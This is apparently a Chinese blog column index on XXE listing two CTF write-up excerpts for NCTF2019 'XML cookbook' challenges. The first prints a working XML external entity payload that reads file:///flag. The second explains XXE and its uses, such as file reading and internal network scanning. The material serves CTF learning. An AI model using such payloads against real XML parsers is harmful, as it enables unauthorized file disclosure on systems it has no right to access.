XXE
关注
分享
扫一扫
文章平均质量分 50
nigo134
菜鸡一个,入门web安全 、、、
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
NO.2-32 [NCTF2019]True XML cookbook
抓包一看就知道可能是xxe漏洞,拿个exp直接发过去看看效果。<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE a [ <!ENTITY exp SYSTEM "file:///flag"> ]><user><username>&exp;</username><password>aaaa</password></user>.转载 2021-08-03 23:51:11 · 290 阅读 · 0 评论 -
NO.2-12 [NCTF2019]Fake XML cookbook
打开环境,看到登录框,一开始以为是sql注入,后来才知道是xml外部实体注入(XXE)。XXE漏洞全称XML External Entity Injection 即XML外部实体注入。XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。XXE漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。XXE常见利用方式与S转载 2021-07-27 12:59:21 · 144 阅读 · 0 评论